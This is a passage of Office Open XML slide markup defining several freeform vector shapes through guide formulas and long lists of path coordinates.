                  <a:gd name="T76" fmla="*/ 142 w 553"/>
                  <a:gd name="T77" fmla="*/ 10 h 557"/>
                  <a:gd name="T78" fmla="*/ 216 w 553"/>
                  <a:gd name="T79" fmla="*/ 0 h 557"/>
                  <a:gd name="T80" fmla="*/ 258 w 553"/>
                  <a:gd name="T81" fmla="*/ 5 h 557"/>
                  <a:gd name="T82" fmla="*/ 331 w 553"/>
                  <a:gd name="T83" fmla="*/ 42 h 557"/>
                  <a:gd name="T84" fmla="*/ 268 w 553"/>
                  <a:gd name="T85" fmla="*/ 173 h 557"/>
                  <a:gd name="T86" fmla="*/ 237 w 553"/>
                  <a:gd name="T87" fmla="*/ 142 h 5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553" h="557">
                    <a:moveTo>
                      <a:pt x="237" y="142"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="237" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="190" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="174" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="157"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="199"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="132" y="220"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="164" y="267"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="221" y="330"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="289" y="388"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="409"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="384" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="400" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="415" y="414"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="436" y="367"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="431" y="351"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="426" y="336"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="373" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="468" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="505" y="210"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="531" y="252"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="547" y="289"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="325"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="552" y="362"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="536" y="404"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="515" y="441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="478" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="405" y="541"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="546"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="231" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="430"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="320"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="273"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="17" y="142"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="106" y="31"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="258" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="363" y="73"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="237" y="142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0" name="Freeform 26"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3221038" y="1758950"/>
                <a:ext cx="225425" cy="215900"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 48 w 626"/>
                  <a:gd name="T1" fmla="*/ 331 h 600"/>
                  <a:gd name="T2" fmla="*/ 6 w 626"/>
                  <a:gd name="T3" fmla="*/ 262 h 600"/>
                  <a:gd name="T4" fmla="*/ 0 w 626"/>
                  <a:gd name="T5" fmla="*/ 226 h 600"/>
                  <a:gd name="T6" fmla="*/ 0 w 626"/>
                  <a:gd name="T7" fmla="*/ 194 h 600"/>
                  <a:gd name="T8" fmla="*/ 32 w 626"/>
                  <a:gd name="T9" fmla="*/ 131 h 600"/>
                  <a:gd name="T10" fmla="*/ 53 w 626"/>
                  <a:gd name="T11" fmla="*/ 100 h 600"/>
                  <a:gd name="T12" fmla="*/ 79 w 626"/>
                  <a:gd name="T13" fmla="*/ 74 h 600"/>
                  <a:gd name="T14" fmla="*/ 168 w 626"/>
                  <a:gd name="T15" fmla="*/ 11 h 600"/>
                  <a:gd name="T16" fmla="*/ 205 w 626"/>
                  <a:gd name="T17" fmla="*/ 0 h 600"/>
                  <a:gd name="T18" fmla="*/ 236 w 626"/>
                  <a:gd name="T19" fmla="*/ 0 h 600"/>
                  <a:gd name="T20" fmla="*/ 294 w 626"/>
                  <a:gd name="T21" fmla="*/ 21 h 600"/>
                  <a:gd name="T22" fmla="*/ 320 w 626"/>
                  <a:gd name="T23" fmla="*/ 42 h 600"/>
                  <a:gd name="T24" fmla="*/ 541 w 626"/>
                  <a:gd name="T25" fmla="*/ 284 h 600"/>
                  <a:gd name="T26" fmla="*/ 583 w 626"/>
                  <a:gd name="T27" fmla="*/ 331 h 600"/>
                  <a:gd name="T28" fmla="*/ 625 w 626"/>
                  <a:gd name="T29" fmla="*/ 352 h 600"/>
                  <a:gd name="T30" fmla="*/ 525 w 626"/>
                  <a:gd name="T31" fmla="*/ 446 h 600"/>
                  <a:gd name="T32" fmla="*/ 499 w 626"/>
                  <a:gd name="T33" fmla="*/ 431 h 600"/>
                  <a:gd name="T34" fmla="*/ 473 w 626"/>
                  <a:gd name="T35" fmla="*/ 415 h 600"/>
                  <a:gd name="T36" fmla="*/ 473 w 626"/>
                  <a:gd name="T37" fmla="*/ 462 h 600"/>
                  <a:gd name="T38" fmla="*/ 467 w 626"/>
                  <a:gd name="T39" fmla="*/ 494 h 600"/>
                  <a:gd name="T40" fmla="*/ 441 w 626"/>
                  <a:gd name="T41" fmla="*/ 530 h 600"/>
                  <a:gd name="T42" fmla="*/ 410 w 626"/>
                  <a:gd name="T43" fmla="*/ 562 h 600"/>
                  <a:gd name="T44" fmla="*/ 352 w 626"/>
                  <a:gd name="T45" fmla="*/ 593 h 600"/>
                  <a:gd name="T46" fmla="*/ 326 w 626"/>
                  <a:gd name="T47" fmla="*/ 599 h 600"/>
                  <a:gd name="T48" fmla="*/ 300 w 626"/>
                  <a:gd name="T49" fmla="*/ 593 h 600"/>
                  <a:gd name="T50" fmla="*/ 247 w 626"/>
                  <a:gd name="T51" fmla="*/ 572 h 600"/>
                  <a:gd name="T52" fmla="*/ 226 w 626"/>
                  <a:gd name="T53" fmla="*/ 556 h 600"/>
                  <a:gd name="T54" fmla="*/ 205 w 626"/>
                  <a:gd name="T55" fmla="*/ 535 h 600"/>
                  <a:gd name="T56" fmla="*/ 168 w 626"/>
                  <a:gd name="T57" fmla="*/ 478 h 600"/>
                  <a:gd name="T58" fmla="*/ 158 w 626"/>
                  <a:gd name="T59" fmla="*/ 452 h 600"/>
                  <a:gd name="T60" fmla="*/ 153 w 626"/>
                  <a:gd name="T61" fmla="*/ 425 h 600"/>
                  <a:gd name="T62" fmla="*/ 163 w 626"/>
                  <a:gd name="T63" fmla="*/ 368 h 600"/>
                  <a:gd name="T64" fmla="*/ 179 w 626"/>
                  <a:gd name="T65" fmla="*/ 341 h 600"/>
                  <a:gd name="T66" fmla="*/ 242 w 626"/>
                  <a:gd name="T67" fmla="*/ 241 h 600"/>
                  <a:gd name="T68" fmla="*/ 252 w 626"/>
                  <a:gd name="T69" fmla="*/ 215 h 600"/>
                  <a:gd name="T70" fmla="*/ 257 w 626"/>
                  <a:gd name="T71" fmla="*/ 194 h 600"/>
                  <a:gd name="T72" fmla="*/ 242 w 626"/>
                  <a:gd name="T73" fmla="*/ 152 h 600"/>
                  <a:gd name="T74" fmla="*/ 216 w 626"/>
                  <a:gd name="T75" fmla="*/ 131 h 600"/>
                  <a:gd name="T76" fmla="*/ 195 w 626"/>
                  <a:gd name="T77" fmla="*/ 126 h 600"/>
                  <a:gd name="T78" fmla="*/ 173 w 626"/>
                  <a:gd name="T79" fmla="*/ 126 h 600"/>
                  <a:gd name="T80" fmla="*/ 147 w 626"/>
                  <a:gd name="T81" fmla="*/ 147 h 600"/>
                  <a:gd name="T82" fmla="*/ 121 w 626"/>
                  <a:gd name="T83" fmla="*/ 178 h 600"/>
                  <a:gd name="T84" fmla="*/ 121 w 626"/>
                  <a:gd name="T85" fmla="*/ 194 h 600"/>
                  <a:gd name="T86" fmla="*/ 142 w 626"/>
                  <a:gd name="T87" fmla="*/ 241 h 600"/>
                  <a:gd name="T88" fmla="*/ 58 w 626"/>
                  <a:gd name="T89" fmla="*/ 341 h 600"/>
                  <a:gd name="T90" fmla="*/ 315 w 626"/>
                  <a:gd name="T91" fmla="*/ 284 h 600"/>
                  <a:gd name="T92" fmla="*/ 300 w 626"/>
                  <a:gd name="T93" fmla="*/ 310 h 600"/>
                  <a:gd name="T94" fmla="*/ 279 w 626"/>
                  <a:gd name="T95" fmla="*/ 347 h 600"/>
                  <a:gd name="T96" fmla="*/ 273 w 626"/>
                  <a:gd name="T97" fmla="*/ 373 h 600"/>
                  <a:gd name="T98" fmla="*/ 300 w 626"/>
                  <a:gd name="T99" fmla="*/ 431 h 600"/>
                  <a:gd name="T100" fmla="*/ 320 w 626"/>
                  <a:gd name="T101" fmla="*/ 452 h 600"/>
                  <a:gd name="T102" fmla="*/ 342 w 626"/>
                  <a:gd name="T103" fmla="*/ 462 h 600"/>
                  <a:gd name="T104" fmla="*/ 368 w 626"/>
                  <a:gd name="T105" fmla="*/ 467 h 600"/>
                  <a:gd name="T106" fmla="*/ 389 w 626"/>
                  <a:gd name="T107" fmla="*/ 452 h 600"/>
                  <a:gd name="T108" fmla="*/ 410 w 626"/>
                  <a:gd name="T109" fmla="*/ 431 h 600"/>
                  <a:gd name="T110" fmla="*/ 420 w 626"/>
                  <a:gd name="T111" fmla="*/ 399 h 600"/>
                  <a:gd name="T112" fmla="*/ 420 w 626"/>
                  <a:gd name="T113" fmla="*/ 383 h 600"/>
                  <a:gd name="T114" fmla="*/ 420 w 626"/>
                  <a:gd name="T115" fmla="*/ 368 h 600"/>
                  <a:gd name="T116" fmla="*/ 399 w 626"/>
                  <a:gd name="T117" fmla="*/ 331 h 600"/>
                  <a:gd name="T118" fmla="*/ 326 w 626"/>
                  <a:gd name="T119" fmla="*/ 247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26" h="600">
                    <a:moveTo>
                      <a:pt x="48" y="331"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="48" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="21" y="294"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="262"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="226"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="158"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="53" y="100"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="79" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="236" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="268" y="5"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="294" y="21"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="42"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="347" y="63"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="541" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="583" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="625" y="352"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="525" y="446"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="499" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="415"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="473" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="467" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="441" y="530"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="562"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="383" y="583"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="352" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="599"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="593"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="588"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="247" y="572"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="226" y="556"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="205" y="535"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="168" y="478"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="158" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="425"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="179" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="215"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="257" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="252" y="173"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="242" y="152"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="216" y="131"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="195" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="184" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="173" y="126"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="147" y="147"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="168"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="178"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="121" y="194"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="126" y="221"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="142" y="241"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="153" y="258"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="341"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="331"/>
                    </a:lnTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="315" y="284"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="315" y="284"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="310"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="273" y="373"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="279" y="405"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="300" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="320" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="357" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="368" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="378" y="462"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="389" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="431"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="399"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="383"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="420" y="368"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="410" y="347"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="399" y="331"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="326" y="247"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="315" y="284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1" name="Freeform 27"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3303588" y="1625600"/>
                <a:ext cx="206375" cy="242888"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 111 w 574"/>
                  <a:gd name="T1" fmla="*/ 0 h 673"/>
                  <a:gd name="T2" fmla="*/ 573 w 574"/>
                  <a:gd name="T3" fmla="*/ 582 h 673"/>
                  <a:gd name="T4" fmla="*/ 462 w 574"/>
                  <a:gd name="T5" fmla="*/ 672 h 673"/>
                  <a:gd name="T6" fmla="*/ 0 w 574"/>
                  <a:gd name="T7" fmla="*/ 89 h 673"/>
                  <a:gd name="T8" fmla="*/ 111 w 574"/>
                  <a:gd name="T9" fmla="*/ 0 h 6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4" h="673">
                    <a:moveTo>
                      <a:pt x="111" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="573" y="582"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="462" y="672"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="111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2" name="Freeform 28"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3479800" y="1473200"/>
                <a:ext cx="244475" cy="271463"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 372 w 678"/>
                  <a:gd name="T1" fmla="*/ 593 h 752"/>
                  <a:gd name="T2" fmla="*/ 409 w 678"/>
                  <a:gd name="T3" fmla="*/ 614 h 752"/>
                  <a:gd name="T4" fmla="*/ 446 w 678"/>
                  <a:gd name="T5" fmla="*/ 620 h 752"/>
                  <a:gd name="T6" fmla="*/ 488 w 678"/>
                  <a:gd name="T7" fmla="*/ 599 h 752"/>
                  <a:gd name="T8" fmla="*/ 530 w 678"/>
                  <a:gd name="T9" fmla="*/ 546 h 752"/>
                  <a:gd name="T10" fmla="*/ 530 w 678"/>
                  <a:gd name="T11" fmla="*/ 510 h 752"/>
                  <a:gd name="T12" fmla="*/ 514 w 678"/>
                  <a:gd name="T13" fmla="*/ 473 h 752"/>
                  <a:gd name="T14" fmla="*/ 482 w 678"/>
                  <a:gd name="T15" fmla="*/ 441 h 752"/>
                  <a:gd name="T16" fmla="*/ 446 w 678"/>
                  <a:gd name="T17" fmla="*/ 426 h 752"/>
                  <a:gd name="T18" fmla="*/ 398 w 678"/>
                  <a:gd name="T19" fmla="*/ 426 h 752"/>
                  <a:gd name="T20" fmla="*/ 283 w 678"/>
                  <a:gd name="T21" fmla="*/ 452 h 752"/>
                  <a:gd name="T22" fmla="*/ 199 w 678"/>
                  <a:gd name="T23" fmla="*/ 457 h 752"/>
                  <a:gd name="T24" fmla="*/ 131 w 678"/>
                  <a:gd name="T25" fmla="*/ 441 h 752"/>
                  <a:gd name="T26" fmla="*/ 73 w 678"/>
                  <a:gd name="T27" fmla="*/ 394 h 752"/>
                  <a:gd name="T28" fmla="*/ 20 w 678"/>
                  <a:gd name="T29" fmla="*/ 316 h 752"/>
                  <a:gd name="T30" fmla="*/ 10 w 678"/>
                  <a:gd name="T31" fmla="*/ 189 h 752"/>
                  <a:gd name="T32" fmla="*/ 47 w 678"/>
                  <a:gd name="T33" fmla="*/ 116 h 752"/>
                  <a:gd name="T34" fmla="*/ 120 w 678"/>
                  <a:gd name="T35" fmla="*/ 52 h 752"/>
                  <a:gd name="T36" fmla="*/ 199 w 678"/>
                  <a:gd name="T37" fmla="*/ 11 h 752"/>
                  <a:gd name="T38" fmla="*/ 283 w 678"/>
                  <a:gd name="T39" fmla="*/ 0 h 752"/>
                  <a:gd name="T40" fmla="*/ 357 w 678"/>
                  <a:gd name="T41" fmla="*/ 26 h 752"/>
                  <a:gd name="T42" fmla="*/ 430 w 678"/>
                  <a:gd name="T43" fmla="*/ 105 h 752"/>
                  <a:gd name="T44" fmla="*/ 283 w 678"/>
                  <a:gd name="T45" fmla="*/ 152 h 752"/>
                  <a:gd name="T46" fmla="*/ 251 w 678"/>
                  <a:gd name="T47" fmla="*/ 132 h 752"/>
                  <a:gd name="T48" fmla="*/ 199 w 678"/>
                  <a:gd name="T49" fmla="*/ 132 h 752"/>
                  <a:gd name="T50" fmla="*/ 167 w 678"/>
                  <a:gd name="T51" fmla="*/ 152 h 752"/>
                  <a:gd name="T52" fmla="*/ 147 w 678"/>
                  <a:gd name="T53" fmla="*/ 184 h 752"/>
                  <a:gd name="T54" fmla="*/ 141 w 678"/>
                  <a:gd name="T55" fmla="*/ 216 h 752"/>
                  <a:gd name="T56" fmla="*/ 162 w 678"/>
                  <a:gd name="T57" fmla="*/ 257 h 752"/>
                  <a:gd name="T58" fmla="*/ 204 w 678"/>
                  <a:gd name="T59" fmla="*/ 299 h 752"/>
                  <a:gd name="T60" fmla="*/ 236 w 678"/>
